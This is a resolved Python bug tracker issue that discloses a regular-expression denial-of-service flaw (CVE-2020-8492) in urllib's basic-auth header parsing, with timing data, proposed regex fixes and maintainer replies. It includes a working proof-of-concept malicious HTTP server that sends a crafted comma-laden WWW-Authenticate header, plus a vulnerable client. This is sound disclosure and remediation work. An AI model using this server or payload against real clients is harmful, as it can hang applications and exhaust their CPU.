classification
Title: Regular Expression Denial of Service in urllib.request.AbstractBasicAuthHandler
Type: security
Stage: resolved
Components: Library (Lib)
Versions: Python 3.9, Python 3.8, Python 3.7, Python 3.6, Python 3.5, Python 2.7
process
Status: closed
Resolution: duplicate
Dependencies:
Superseder: [security][CVE-2020-8492] Denial of service in urllib.request.AbstractBasicAuthHandler (bpo-39503)
Assigned To:
Nosy List: Anselmo Melo, bc, mgorny, mrabarnett, vstinner, xtreak
Priority: normal
Keywords:

Created on 2019-11-17 01:45 by bc, last changed 2022-04-11 14:59 by admin. This issue is now closed.

Messages (5)
msg356785 Author: Ben Caller (bc) Date: 2019-11-17 01:45
The regular expression urllib.request.AbstractBasicAuthHandler.rx is vulnerable to malicious inputs which cause denial of service (REDoS).

The regex is:

    rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
                    'realm=(["\']?)([^"\']*)\\2', re.I)

On a run of commas, the first line of the pattern can act like:

    (,*,)*(,+)[ \t]

This shows that there are many different ways to match a long sequence of commas.

Input from the WWW-Authenticate or Proxy-Authenticate headers of HTTP responses will reach the regex via the http_error_auth_reqed method as long as the header value starts with "basic ".

We can craft a malicious input:

    urllib.request.AbstractBasicAuthHandler.rx.search(
        "basic " + ("," * 100) + "A"
    )

This causes catastrophic backtracking and takes a large amount of CPU time to process.

I measured the time to complete, in seconds, for different numbers of commas in the string:

Commas  Seconds
18        0.289
19        0.57
20        1.14
21        2.29
22        4.55
23        9.17
24       18.3
25       36.5
26       75.1
27      167

This shows an exponential relationship, O(2^x): each extra comma roughly doubles the running time.
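
A minimal sketch for reproducing this kind of measurement is shown below. It assumes the pattern is copied locally from the report rather than read from urllib.request, since a patched interpreter may ship a different rx. The names VULNERABLE_RX and time_search are hypothetical, and the range of comma counts is kept deliberately small so the loop finishes quickly.

```python
import re
import time

# Pattern copied from the report; defined locally (an assumption) because a
# patched interpreter may ship a different AbstractBasicAuthHandler.rx.
VULNERABLE_RX = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
                           'realm=(["\']?)([^"\']*)\\2', re.I)


def time_search(n_commas):
    """Return (match, seconds) for one search over "basic ,,,...,A"."""
    value = "basic " + ("," * n_commas) + "A"
    start = time.perf_counter()
    match = VULNERABLE_RX.search(value)
    return match, time.perf_counter() - start


if __name__ == "__main__":
    # Keep n small: the table above suggests each extra comma roughly
    # doubles the running time.
    for n in range(10, 17):
        _, seconds = time_search(n)
        print(f"{n:2d}  {seconds:.4f}")
```

Absolute timings will differ between machines; the growth from one row to the next is the point of interest.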

The maximum length of comma string that can fit in a response header is 65509, which would take my computer just 6E+19706 years to complete.

Example malicious server:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_basic_auth(n_commas):
        commas = "," * n_commas
        return f"basic {commas}A"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(401)
            n_commas = (
                int(self.path[1:])
                if len(self.path) > 1 else
                65509
            )
            value = make_basic_auth(n_commas)
            self.send_header("www-authenticate", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

Vulnerable client:

    import urllib.request
    opener = urllib.request.build_opener(urllib.request.HTTPBasicAuthHandler())
    opener.open("http://localhost:44020/")

As such, Python applications using urllib.request may need to be careful not to visit malicious servers.

I think the regex can be replaced with:

    rx = re.compile('basic[ \t]+realm=(["\']?)([^"\']*)\\1', re.I)
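
As a rough check of a narrowed pattern in this spirit, the sketch below runs it against both a normal header and the malicious input. It assumes the closing-quote backreference should point at the quote group, which becomes group 1 once the scheme group is dropped; NARROW_RX and find_realm are hypothetical names, not part of urllib.request.

```python
import re

# Hypothetical narrowed pattern: group 1 is the optional quote, group 2 is
# the realm, so the closing quote is matched with the backreference \1.
NARROW_RX = re.compile(r'''basic[ \t]+realm=(["']?)([^"']*)\1''', re.I)


def find_realm(header_value):
    """Return the realm from a Basic challenge, or None if nothing matches."""
    match = NARROW_RX.search(header_value)
    return match.group(2) if match else None


if __name__ == "__main__":
    print(find_realm('Basic realm="test"'))
    # The comma run from the report no longer offers the engine
    # alternative ways to split the input.
    print(find_realm("basic " + ("," * 65509) + "A"))
```

Note that code consuming the match groups would need adjusting, because the original pattern captured the scheme as an extra first group.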

- Ben

msg356787 Author: Karthikeyan Singaravelan (xtreak) (Python committer) Date: 2019-11-17 02:27
Thanks for the report. Please report security issues to security@python.org so that the security team can analyze and triage it to be made public. More information at https://www.python.org/news/security/

msg356800 Author: Ben Caller (bc) Date: 2019-11-17 11:18
I have been advised that DoS issues can be reported on the public bug tracker, since there is no privilege escalation, but that they should still carry the security label.

msg363269 Author: Matthew Barnett (mrabarnett) (Python triager) Date: 2020-03-03 16:01
A smaller change to the regex would be to replace the "(?:.*,)*" with "(?:[^,]*,)*".

I'd also suggest using a raw string instead:

    rx = re.compile(r'''(?:[^,]*,)*[ \t]*([^ \t]+)[ \t]+realm=(["']?)([^"']*)\2''', re.I)
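
The following sketch exercises this pattern on a few inputs, including the 100-comma string from the original report. The names SUGGESTED_RX and parse_challenge are hypothetical. It only checks the inputs shown and does not establish worst-case behaviour for header-sized inputs.

```python
import re

# Pattern as suggested above: each repetition of the leading group must end
# at a comma and cannot contain one, so a comma run splits in only one way.
SUGGESTED_RX = re.compile(
    r'''(?:[^,]*,)*[ \t]*([^ \t]+)[ \t]+realm=(["']?)([^"']*)\2''', re.I)


def parse_challenge(header_value):
    """Return (scheme, quote, realm) for the matched challenge, or None."""
    match = SUGGESTED_RX.search(header_value)
    return match.groups() if match else None


if __name__ == "__main__":
    print(parse_challenge('Basic realm="test"'))
    print(parse_challenge('Digest realm="a", Basic realm="b"'))
    print(parse_challenge("basic " + ("," * 100) + "A"))
```

The group layout (scheme, quote, realm) is unchanged from the original pattern, so callers that unpack three groups keep working.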

msg364995 Author: STINNER Victor (vstinner) (Python committer) Date: 2020-03-25 16:19
This issue is a duplicate of bpo-39503 which has a PR. Thanks Ben Caller for the report, I credited you in my fix ;-)

History
Date                 User          Action  Args
2022-04-11 14:59:23  admin         set     github: 83007
2020-03-25 16:19:39  vstinner      set     status: open -> closed
                                           superseder: [security][CVE-2020-8492] Denial of service in urllib.request.AbstractBasicAuthHandler
                                           nosy: + vstinner
                                           messages: + msg364995
                                           resolution: duplicate
                                           stage: resolved
2020-03-03 16:01:15  mrabarnett    set     nosy: + mrabarnett
                                           messages: + msg363269
2020-03-02 09:23:25  mgorny        set     nosy: + mgorny
2020-02-04 18:41:33  Anselmo Melo  set     nosy: + Anselmo Melo
2019-11-17 11:18:26  bc            set     messages: + msg356800
2019-11-17 02:27:41  xtreak        set     nosy: + xtreak
                                           messages: + msg356787
2019-11-17 01:45:42  bc            create